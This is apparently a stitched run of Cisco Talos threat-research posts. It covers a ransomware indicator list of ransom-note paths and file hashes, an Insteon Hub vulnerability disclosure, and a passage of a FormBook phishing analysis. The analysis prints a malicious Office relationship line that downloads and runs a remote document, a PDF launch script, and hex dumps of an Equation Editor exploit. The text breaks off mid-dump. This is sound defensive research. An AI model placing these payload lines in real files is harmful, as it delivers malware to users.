%UserProfile%\Documents\OneNote Notebooks\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\asay[1].htm
%LocalAppData%\Temp\~DF9ADF51BEE85B3E02.TMP
%AppData%\Macromedia\Flash Player\macromedia.com\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\onion[1].jpg
%AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\webapps\CRAB-DECRYPT.txt
%SystemDrive%\TEMP\CRAB-DECRYPT.txt
%LocalAppData%\Temporary Internet Files\CRAB-DECRYPT.txt
%AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\CRAB-DECRYPT.txt
%AppData%\Microsoft\Vault\CRAB-DECRYPT.txt
%AppData%\Microsoft\Proof\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\UserData\Low\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\jquery-migrate-1.0.0.min[1].js
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\download-easy.html[1].htm
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\uipleiss[1].htm
%AppData%\Microsoft\Spelling\CRAB-DECRYPT.txt
%AppData%\Mozilla\Firefox\Crash Reports\CRAB-DECRYPT.txt
%AppData%\Microsoft\Word\CRAB-DECRYPT.txt
%ProgramFiles% (x86)\Microsoft SQL Server Compact Edition\v3.5\CRAB-DECRYPT.txt
%AppData%\Microsoft\Access\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\button-downloadpage[1].png
%AppData%\Microsoft\Templates\LiveContent\Managed\Document Themes\CRAB-DECRYPT.txt
%AppData%\Adobe\Acrobat\9.0\Collab\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\UserData\EUPM6R87\CRAB-DECRYPT.txt
%AppData%\Adobe\Flash Player\AssetCache\TRFRW6GU\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\Quick Launch\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\CRAB-DECRYPT.txt
%SystemDrive%\MSOCache\CRAB-DECRYPT.txt
%AppData%\Microsoft\Crypto\RSA\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\CRAB-DECRYPT.txt
%SystemDrive%\System Volume Information\Chkdsk\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\CRAB-DECRYPT.txt
%AppData%\Adobe\Acrobat\9.0\Forms\CRAB-DECRYPT.txt
%UserProfile%\Saved Games\CRAB-DECRYPT.txt
%AppData%\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\shadowAlpha[1].png
%AppData%\Microsoft\Templates\LiveContent\User\SmartArt Graphics\CRAB-DECRYPT.txt
%AppData%\Mozilla\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\typography.min[1].css
%AppData%\Adobe\CRAB-DECRYPT.txt
%LocalAppData%\Temp\~DF3DE6857420342E9D.TMP
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\btn_donateCC_LG[1].gif
%AppData%\Adobe\Acrobat\9.0\JavaScripts\CRAB-DECRYPT.txt
%UserProfile%\Searches\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\CRAB-DECRYPT.txt
%UserProfile%\Favorites\Microsoft Websites\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\jquery.accordion.min[1].js
%SystemDrive%\Documents and Settings\CRAB-DECRYPT.txt
%SystemDrive%\System Volume Information\SPP\SppGroupCache\CRAB-DECRYPT.txt
%UserProfile%\Documents\My Videos\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\master.min[1].css
%UserProfile%\Start Menu\CRAB-DECRYPT.txt
%AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\minidumps\CRAB-DECRYPT.txt
%LocalAppData%\History\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\reset.min[1].css
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\warning[1].png
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\jquery.ba-bbq.min[1].js
%AppData%\Microsoft\MSDN\8.0\CRAB-DECRYPT.txt
%UserProfile%\Favorites\MSN Websites\CRAB-DECRYPT.txt
%UserProfile%\NetHood\CRAB-DECRYPT.txt
%SystemDrive%\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-1002\CRAB-DECRYPT.txt
%AppData%\Microsoft\Stationery\CRAB-DECRYPT.txt
%AppData%\Adobe\Flash Player\AssetCache\CRAB-DECRYPT.txt
%AppData%\Microsoft\OneNote\14.0\CRAB-DECRYPT.txt
%UserProfile%\Documents\CRAB-DECRYPT.txt
%AppData%\Microsoft\Publisher Building Blocks\CRAB-DECRYPT.txt
%SystemDrive%\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\CRAB-DECRYPT.txt
%System32%\config\systemprofile\AppData\LocalLow\Microsoft\Internet Explorer
%UserProfile%\Desktop\CRAB-DECRYPT.txt
\??\Volume{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}\System Volume Information\tracking.log.tmp
%UserProfile%\Templates\CRAB-DECRYPT.txt
%UserProfile%\Documents\My Pictures\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\Quick Launch\User Pinned\CRAB-DECRYPT.txt
%System32%\config\systemprofile\AppData\LocalLow\Microsoft\Internet Explorer\Services
%AppData%\Macromedia\Flash Player\#SharedObjects\CRAB-DECRYPT.txt
%AppData%\Microsoft\Outlook\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\cta-buttons[1].jpg
%AppData%\Macromedia\Flash Player\#SharedObjects\YXTRFETG\CRAB-DECRYPT.txt
%AppData%\Microsoft\Crypto\CRAB-DECRYPT.txt
%AppData%\Macromedia\CRAB-DECRYPT.txt
%UserProfile%\PrintHood\CRAB-DECRYPT.txt
%System32%\Microsoft\Protect\S-1-5-18\User\61c31507-0d97-4080-aca3-fd44f12c8dbd
%AppData%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\CRAB-DECRYPT.txt
%AppData%\Microsoft\Protect\CRAB-DECRYPT.txt
%SystemDrive%\System Volume Information\SPP\OnlineMetadataCache\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\layout.min[1].css
%AppData%\Microsoft\SystemCertificates\CRAB-DECRYPT.txt
%AppData%\Microsoft\CRAB-DECRYPT.txt
%AppData%\Mozilla\Firefox\Profiles\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\dlpage01[1].js
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\favicon[2].ico
%AppData%\Microsoft\Publisher\CRAB-DECRYPT.txt
%ProgramFiles% (x86)\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\UserData\M2V73K19\CRAB-DECRYPT.txt
%AppData%\Adobe\Acrobat\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\UserData\EXUAAUDV\CRAB-DECRYPT.txt
%UserProfile%\Documents\OneNote Notebooks\Personal\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\favicon[1].ico
%SystemDrive%\PerfLogs\Admin\CRAB-DECRYPT.txt
%SystemDrive%\PerfLogs\CRAB-DECRYPT.txt
%UserProfile%\Recorded TV\CRAB-DECRYPT.txt
%UserProfile%\Documents\Outlook Files\CRAB-DECRYPT.txt
%AppData%\Adobe\Acrobat\9.0\CRAB-DECRYPT.txt
%SystemDrive%\CRAB-DECRYPT.txt
%ProgramFiles% (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\CRAB-DECRYPT.txt
\??\E:\$RECYCLE.BIN\S-1-5-21-2580483871-590521980-3826313501-500\CRAB-DECRYPT.txt
%AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\CRAB-DECRYPT.txt
%AppData%\Microsoft\Document Building Blocks\1033\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\Managed\CRAB-DECRYPT.txt
%UserProfile%\Favorites\Links\CRAB-DECRYPT.txt
%AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\bookmarkbackups\CRAB-DECRYPT.txt
%AppData%\Microsoft\Office\CRAB-DECRYPT.txt
%AppData%\Microsoft\MMC\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\UserData\MA3SBLRS\CRAB-DECRYPT.txt
%AppData%\Microsoft\Credentials\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\headerbg[1].jpg
%ProgramFiles%\CRAB-DECRYPT.txt
%AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\UserData\CRAB-DECRYPT.txt
%ProgramFiles% (x86)\Microsoft SQL Server Compact Edition\CRAB-DECRYPT.txt
%AppData%\Microsoft\Document Building Blocks\1033\14\CRAB-DECRYPT.txt
%SystemDrive%\System Volume Information\SPP\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Internet Explorer\Recovery\High\Active\{50743783-67B4-11E8-8419-00501E3AE7B5}.dat
%UserProfile%\Contacts\CRAB-DECRYPT.txt
%UserProfile%\Links\CRAB-DECRYPT.txt
%LocalAppData%\CRAB-DECRYPT.txt
%UserProfile%\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\UserData\8HDD5GFC\CRAB-DECRYPT.txt
%LocalAppData%\Temp\CRAB-DECRYPT.txt
%AppData%\Adobe\Flash Player\NativeCache\CRAB-DECRYPT.txt
%AppData%\Microsoft\Excel\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\CRAB-DECRYPT.txt
%AppData%\Microsoft\OneNote\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\X3FXG4H3.htm
%AppData%\Microsoft\Signatures\CRAB-DECRYPT.txt
%AppData%\Microsoft\SystemCertificates\My\Certificates\CRAB-DECRYPT.txt
%AppData%\Macromedia\Flash Player\CRAB-DECRYPT.txt
%UserProfile%\Downloads\CRAB-DECRYPT.txt
%SystemDrive%\Recovery\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\favicon[1].png
%LocalAppData%\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{50743781-67B4-11E8-8419-00501E3AE7B5}.dat
%UserProfile%\Music\Sample Music\CRAB-DECRYPT.txt
%AppData%\Microsoft\HTML Help\CRAB-DECRYPT.txt
%AppData%\Microsoft\InfoPath\CRAB-DECRYPT.txt
%AppData%\Mozilla\Firefox\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\1033\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\User\CRAB-DECRYPT.txt
%UserProfile%\Favorites\Windows Live\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\jquery.client.min[1].js
%SystemDrive%\$Recycle.Bin\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\jquery.min[1].js
%LocalAppData%\Temp\~DF06C80491114E3378.TMP
%AppData%\Microsoft\Internet Explorer\UserData\KKRPCQ2X\CRAB-DECRYPT.txt
%UserProfile%\Pictures\Sample Pictures\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\LiveContent\CRAB-DECRYPT.txt
%SystemDrive%\System Volume Information\SPP\SppCbsHiveStore\CRAB-DECRYPT.txt
%AppData%\Microsoft\Templates\SmartArt Graphics\CRAB-DECRYPT.txt
%AppData%\Microsoft\SystemCertificates\My\CRLs\CRAB-DECRYPT.txt
%UserProfile%\Recent\CRAB-DECRYPT.txt
%AppData%\Microsoft\UProof\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\CRAB-DECRYPT.txt
%UserProfile%\SendTo\CRAB-DECRYPT.txt
%UserProfile%\AppData\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\InternetDefenseLeague-footer-badge[1].png
%AppData%\Identities\{AD47C9A9-E417-4179-A4CD-95C51371116D}\CRAB-DECRYPT.txt
%UserProfile%\Videos\Sample Videos\CRAB-DECRYPT.txt
%AppData%\Adobe\Flash Player\CRAB-DECRYPT.txt
%WinDir%\ServiceProfiles\LocalService\AppData\Local\~FontCache-S-1-5-18.dat
%SystemDrive%\System Volume Information\CRAB-DECRYPT.txt
%AppData%\Microsoft\MSDN\CRAB-DECRYPT.txt
%AppData%\Adobe\Acrobat\9.0\Security\CRAB-DECRYPT.txt
%LocalAppData%\Microsoft\Internet Explorer\imagestore\aa4x2ky
%LocalAppData%\Temp\KnoC125.tmp
%AppData%\Microsoft\SystemCertificates\My\CRAB-DECRYPT.txt
%AppData%\Microsoft\Internet Explorer\CRAB-DECRYPT.txt
%UserProfile%\Favorites\Links for United States\CRAB-DECRYPT.txt
%AppData%\Microsoft\PowerPoint\CRAB-DECRYPT.txt
%AppData%\Macromedia\Flash Player\macromedia.com\support\CRAB-DECRYPT.txt
%UserProfile%\Documents\My Music\CRAB-DECRYPT.txt
%System32%\config\systemprofile\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
%SystemDrive%\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IEQZMGA.cvr.CRAB
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\tor-logo[1].png
%UserProfile%\Recorded TV\Sample Media\CRAB-DECRYPT.txt
%AppData%\Mozilla\Extensions\CRAB-DECRYPT.txt
%UserProfile%\Libraries\CRAB-DECRYPT.txt
%AppData%\Identities\CRAB-DECRYPT.txt
%AppData%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\CRAB-DECRYPT.txt
%UserProfile%\Documents\OneNote Notebooks\Notes\CRAB-DECRYPT.txt

File Hashes

250fca7ed1806645cf34937eeed0f95a377cc5402a32550c304528bff6d4d09b
a9dbaade69b8576f6ddac343129cd6e65825a42c5e8626f1c8ec8d1a68657f0e
ae0d1591385c573af2ad6b04816a7d6a30c87ccf40e8f02b3c76e66a4c8450e6
f3ec4b314acaff57824363c1d584d729cdcba86931c65b6a412d3203a4571afd
15838f0c2b5035d12540b6f9570b7155a62728f44888739c77e29730cfe281e7
7e6abbd10d276f8cc008b42ce57df3cf29c5d645c8fdcc237c85d10e255c2947
044c4a806be94caa778c6658c268f3cbc1d522f13e8fc0d614177dbcd748d711
91a9f37e7d10d6da919ee61e568644acb6f54f4bf962311fdb0cd9f361c4f91f
638b75f6dfaa2b5fecfc212d776ab0b436e3879535d27cd85bfc5a5ce24db50c
6d2bad6444af859bee7ecc062020dfbb2ae6d31bc9e4448200f43a08b9b1245f
e5cbd3986d56d6819dadf6ab64ee1c8dc62cb94aa10c335c25c4b699f3a26011
875d7ebb0f9fb095fdd7eef74c62256b7c381f7b82e83f84d46c2c06644eda35
30fd86096586372d7e08a35eb3da2a4671045f0103f805bc30fa8e1decbd39a9
23a618ad2bed8afa8bfe36dcfd5db1de8affe72f4c1819950489a898df068be9
cc61f95be51b77ab039b998e5b5dd07ceccb5b5b5a546d76ab1e5e10d24581c8
43978cffbc50878a1407b3df697ca601d02d866c142185787eb00ddd0e0336e5
13b7b1200c9db70c2c85e8155bcb5659036e7854bbcb21586bc96dd26ddc3e34
602bf5202e26057183ef1dbda965d6917930f341b1f12f9e605f34b59ddc8b3a
39bb04bb5e2cfaf0e09755b3d6af1fc25150f9061d36457eea1ec9ec8bfc0568
4ca159d4df61692ea7212c6cea03dea463aa0b89e16fa4f7094a9dd1515e1058

Coverage

Screenshots of Detection

AMP

ThreatGrid

↧

Vulnerability Spotlight: Multiple Remote Vulnerabilities In Insteon Hub PubNub

June 19, 2018, 8:25 am

≫ Next: My Little FormBook

≪ Previous: Threat Roundup for June 1-15

Vulnerabilities discovered by Claudio Bozzato of Cisco Talos

Talos is disclosing twelve new vulnerabilities in Insteon Hub, ranging from remote code execution, to denial of service. The majority of the vulnerabilities have their root cause in the unsafe usage of the strcpy() function, leading either to stack overflow or global overflow.

Overview

Insteon Hub is a central controller, which allows an end user to use a smartphone to connect to and manage devices in their home remotely. To enable remote interaction via the internet, Insteon Hub uses an online service called PubNub.

End users install the "Insteon for Hub" application on their smartphone. Both the smartphone application and Insteon Hub include the PubNub software development kit, which allows for bidirectional communication using PubNub's REST API.

Unless stated otherwise, the vulnerabilities were found in Insteon Hub 2245-222 running firmware version 1012. As of firmware version 1016, these vulnerabilities are fixed, versions previous to this may be vulnerable.

TALOS-2017-0483 - Message Handler Multiple Stack Overflow Remote Code Execution Vulnerabilities

An exploitable buffer overflow vulnerability exists in the way the device handles commands sent through the PubNub service. Specially crafted commands can cause a stack-based buffer overflow, which overwrites arbitrary data due to the use of the strcpy() function while handling the JSON request. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

Note. CVE rules require that we assign a separate CVE to each instance of a vulnerability that can be fixed independently.

CVE: CVE-2017-16252 through CVE-2017-16337

Full technical advisory is available.

TALOS-2017-0484 - Message Handler Multiple Global Overflow Remote Code Execution Vulnerabilities

An exploitable buffer overflow vulnerability exists in the way the device handles commands sent through the PubNub service. Specially crafted commands can cause a buffer overflow on a global section overwriting arbitrary data, due to the use of the strcpy() function while handling the JSON request. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

CVE: CVE-2017-16338, CVE-2017-16339, CVE-2017-16340, CVE-2017-16341, CVE-2017-16342, CVE-2017-16343, CVE-2017-16344, CVE-2017-16345, CVE-2017-16346, CVE-2017-16347

Full technical advisory is available.

TALOS-2017-0485 - Reboot Task Denial Of Service Vulnerability

An exploitable DoS vulnerability exists in the device firmware, which allows an attacker to arbitrarily reboot the device without authentication. An attacker can send an UDP packet to trigger this vulnerability.

CVE: CVE-2017-16348

Full technical advisory is available.

TALOS-2017-0492 - HTTPExecuteGet Firmware Update Information Leak Vulnerability

The HTTP server implementation incorrectly checks the number of GET parameters supplied, leading to an arbitrarily controlled information leak on the device's memory. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

CVE: CVE-2017-14443

Full technical advisory is available.

TALOS-2017-0493 - HTTPExecuteGet Firmware Update URL Parameter Code Execution Vulnerability

The HTTP server implementation incorrectly handles the URL parameter during a firmware update request, leading to a buffer overflow on a global section. The library used by the vendor does provide some level of protection against buffer overflows, however. By using vulnerability TALOS-2017-0492, it is possible to bypass this protection and achieve code execution. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

CVE: CVE-2017-14444

Full technical advisory is available.

TALOS-2017-0494 - HTTPExecuteGet Firmware Update host Parameter Buffer Overflow Vulnerability

The HTTP server implementation incorrectly handles the host parameter during a firmware update request, leading to a buffer overflow on a global section. The library used by the vendor does provide some level of protection against buffer overflows, which in this case, cannot be circumvented. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

CVE: CVE-2017-14445

Full technical advisory is available.

TALOS-2017-0495 - HTTPExecuteGet Parameters Extraction Code Execution Vulnerability

The HTTP server implementation unsafely extracts parameters from the query string, leading to a buffer overflow on the stack. The vulnerability exists because the extraction of the arguments is made without ensuring size constraints. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

CVE: CVE-2017-14446

Full technical advisory is available.

TALOS-2017-0496 - Insteon Hub PubNub "ad" Channel Message Handler Code Execution Vulnerability

An exploitable buffer overflow vulnerability exists in the PubNub message handler for the "ad" channel. A specially crafted command sent through the PubNub service can cause a stack-based buffer overflow, overwriting arbitrary data. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

CVE: CVE-2017-14447

Full technical advisory is available.

TALOS-2017-0502 - Insteon Hub PubNub control Channel Message Handler Code Execution Vulnerabilities

An exploitable buffer overflow vulnerability exists in the way the Hub handles the replies from PubNub, leading to the overwriting of arbitrary data in a global section. The attacker would need to impersonate PubNub and answer an HTTPS GET request to trigger this vulnerability.

CVE: CVE-2017-14452, CVE-2017-14453, CVE-2017-14454, CVE-2017-14455

Full technical advisory is available.

TALOS-2018-0511 - Insteon Hub PubNub MPFS Upload Firmware Update Vulnerability

The HTTP server allows for uploading arbitrary MPFS binaries that could be modified to enable access to hidden resources which allow for uploading unsigned firmware images to the device. To trigger this vulnerability, an attacker needs to have credentials that will be used to upload an MPFS binary via the "/mpfsupload" HTTP form and, later, upload the firmware via a POST request to "firmware.htm."

This vulnerability was found on firmware version 1013.

CVE: CVE-2018-3832

Full technical advisory is available.

TALOS-2018-0512 - Insteon Hub PubNub Firmware Downgrade Vulnerability

An exploitable firmware downgrade vulnerability exists in Insteon Hub running firmware version 1013. The firmware upgrade functionality, triggered via PubNub, retrieves signed firmware binaries using plain HTTP requests. The device doesn't check the firmware version that is going to be installed, and thus allows for flashing older firmware images. To trigger this vulnerability, an attacker needs to impersonate the remote server "cache.insteon.com" and serve any signed firmware image.

CVE: CVE-2018-3833

Full technical advisory is available.

TALOS-2018-0513 - Insteon Hub PubNub Firmware Upgrade Confusion Permanent Denial Of Service Vulnerability

An exploitable permanent DoS vulnerability exists in Insteon Hub running firmware version 1013. The firmware upgrade functionality, triggered via PubNub, retrieves signed firmware binaries using plain HTTP requests. The device doesn't check the kind of firmware image that is going to be installed, and thus allows for flashing any signed firmware into any MCU. Since the device contains different and incompatible MCUs, flashing one firmware to the wrong MCU will result in a permanent unusable condition. To trigger this vulnerability, an attacker needs to impersonate the remote server "cache.insteon.com" and serve a signed firmware image.

CVE: CVE-2018-3834

Full technical advisory is available.

Discussion

Our previous vulnerability research on IoT devices (Fosca m C1 Vulnerabilities, Circle with Disney) has shown that these kinds of devices are often vulnerable.

Although several vulnerabilities were also found on Insteon Hub PubNub, some leading to remote code execution, it is worth mentioning that in order to exploit such vulnerabilities, the attacker needs to be in a privileged position. Some vulnerabilities require authentication into the PubNub portal. For others, the attacker needs to be in a position to perform a man-in-the-middle attack. Finally, the device itself also partially mitigates the vulnerability by limiting the size of the HTTP requests, which was proven effective in one of the vulnerabilities.

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org

Snort Rules: 45441, 45422, 44863, 45049, 45086, 45087, 44863, 45088

↧

My Little FormBook

June 20, 2018, 8:00 am

≫ Next: Beers with Talos EP31 - Live from Cisco Live! - VPNFilter and Our First Summit Recap

≪ Previous: Vulnerability Spotlight: Multiple Remote Vulnerabilities In Insteon Hub PubNub

This blog post is authored by Warren Mercer and Paul Rascagneres.

Summary

Cisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as "malware as a service." This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots.

The author put a lot of effort in the infection vector using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and Microsoft Office document) and used two public Microsoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in order to drop the final payload on the targeted system. The final payload was downloaded during the campaign from a small Japanese file-sharing platform (hosted in Netherland). The platform owner has since deleted the malicious payload binaries from their system. Here is the infection workflow:

We identified an infrastructure overlap between this campaign and a previous campaign we published in February 2017 relating to Pony malware which utilized Microsoft Publisher files to deliver its payload. There is the potential that the same actor behind these two attacks is the same due to an overlap in the two attacks' infrastructure. If that is the case, the actor could switch between Pony and FormBook to be able to continue their malicious activities for more than a year.

Infection Vector

Phishing Campaign

This campaign starts with a malicious email containing two attachments. Here is a snippet of the email:

The email pretends to be an order sent from the sales department of a company located in Spain. The website's details and phone number appear to have been copied from that of a genuine company.

The email contains two attachments:

A blank malicious Microsoft Office document template file. (.dotm)
A malicious PDF document that is also blank. (.pdf)

First Office MalDoc (Attached)

The email contains two attachments as mentioned. One of these is a Microsoft Office document template file. This file type is normally used to share templates. The 'normal.dotm' file is the default Microsoft Word template that opens when Word is launched. The attacker, however, does not use the .dotm file format to share templates, but rather to download an additional Office document.

If an example document from the campaign, named "STMORDER-442799.dotm," is opened, it appears blank. However, like most Office documents, if the file is unzipped and opened, you can access the attributes and XML information. This is where the attacker leverages CVE-2017-0199 to trigger an external download by abusing the relationship elements within "STMORDER-442799\word\_rels\document.xml.rels." Despite the file appearing to be blank, it does contain a large amount of XML information. We see the <Relationship> elements being abused:

<Relationship Id="_id_2970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc"/></Relationships>

This will cause the following document to be downloaded and executed from a Japanese file-hosting platform.

At the time of publishing, this file is no longer available and trying to view it results in a 404 error. The platform maintainer of PyonPyon.moe provides a list of malware that has been removed from the hosting platform — this can be found here. Within this data, we can identify our attempted download of the .doc file, among others related to this campaign, which were removed on the same day, June 8:

We were able to obtain multiple .doc files in relation to this campaign, which we will discuss later on. These .doc files are in rich text format (RTF), which leveraged CVE-2017-11882.

PDF document (Attached)

Also, attached to the initial email is a PDF file which contains a JavaScript object:

this.exportDataObject({ cName: "mine001.dotm", nLaunch: 2 });

This code launches a file embedded within the PDF document. In our case, the file is an Office document named "mine001.dotm."

Second Office MalDoc (Embedded)

The embedded Office document is exactly the same as the attached document discussed above. We don't know why the author of this campaign puts the same file in two seperate locations, or if it's on purpose or a mistake made during the phishing generation stage. It's possible the actor did not intend to attach both the DOTM and the PDF.

Third Office MalDoc (Downloaded)

The final malicious Office document is an RTF document. This RTF document contains an object linking and embedding (OLE) stream at the offset 0x9F (header d0 cf 11 e0 a1 b1 1a e1):

00000040  36 39 30 36 64 30 34 33  30 32 30 30 30 30 30 30  |6906d04302000000|
00000050  31 37 30 30 30 30 30 30  37 32 34 37 35 35 33 30  |1700000072475530|
00000060  33 32 37 37 34 65 37 35  36 64 37 36 33 36 34 66  |32774e756d76364f|
00000070  35 30 36 66 36 32 34 62  37 34 35 38 34 37 33 32  |506f624b74584732|
00000080  37 36 35 31 30 30 30 30  30 30 30 30 30 30 30 30  |7651000000000000|
00000090  30 30 30 30 30 30 30 30  31 30 30 30 30 30 64 30  |00000000100000d0|
000000a0  63 66 31 31 65 30 61 31  62 31 31 61 65 31 30 30  |cf11e0a1b11ae100|
000000b0  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
000000c0  30 30 30 30 30 30 30 30  30 30 30 30 30 30 33 65  |000000000000003e|
000000d0  30 30 30 33 30 30 66 65  66 66 30 39 30 30 30 36  |000300feff090006|
000000e0  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
000000f0  30 30 30 30 30 30 30 31  30 30 30 30 30 30 30 31  |0000000100000001|
00000100  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|

We have the beginning of the OLE compound file (CF) — named OLECF — object.

This OLECF object contains a compound file binary format (CFBF) object.This file format is described here. This object is linked to the COM object "0002ce02–0000–0000-c000–000000000046":

00000400  52 00 6f 00 6f 00 74 00  20 00 45 00 6e 00 74 00  |R.o.o.t. .E.n.t.|
00000410  72 00 79 00 00 00 00 00  00 00 00 00 00 00 00 00  |r.y.............|
00000420  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000440  16 00 05 00 ff ff ff ff  ff ff ff ff 01 00 00 00  |................|
00000450  02 ce 02 00 00 00 00 00  c0 00 00 00 00 00 00 46  |...............F|
00000460  00 00 00 00 00 00 00 00  00 00 00 00 d0 e9 36 77  |..............6w|
00000470  7f fc d3 01 03 00 00 00  c0 07 00 00 00 00 00 00  |................|
00000480  01 00 4f 00 6c 00 65 00  31 00 30 00 4e 00 61 00  |..O.l.e.1.0.N.a.|
00000490  74 00 69 00 76 00 65 00  00 00 00 00 00 00 00 00  |t.i.v.e.........|
000004a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

This CLSID is the ID of the Equation Editor as mentioned by Microsoft. Finally, here is where and how the exploit is executed:

00000800  98 07 00 0003 d4 01 6a  72 0a 01 08 7f a9b8 c3  |.......jr.......|
00000810  42 ba ff f7 d0 8b 38 8b  37 bd c6 98 b9 ff f7 d5  |B.....8.7.......|
00000820  8b 4d 77 56 ff d1 05 63  d6 2d 0b 2d 4d d5 2d 0b  |.MwV...c.-.-M.-.|
00000830  ff e0 fa d3 6e 4a c9 6a  83 53e8 d1 41 001e b6  |....nJ.j.S..A...|
00000840  29 1d e6 71 de 92 60 23  40 9d 40 0e 7a d8 9a d6  |)..q..`#@.@.z...|
00000850  26 43 86 98 e0 c4 4e b8  1d 7d 82 46 ce 45 07 be  |&C....N..}.F.E..|
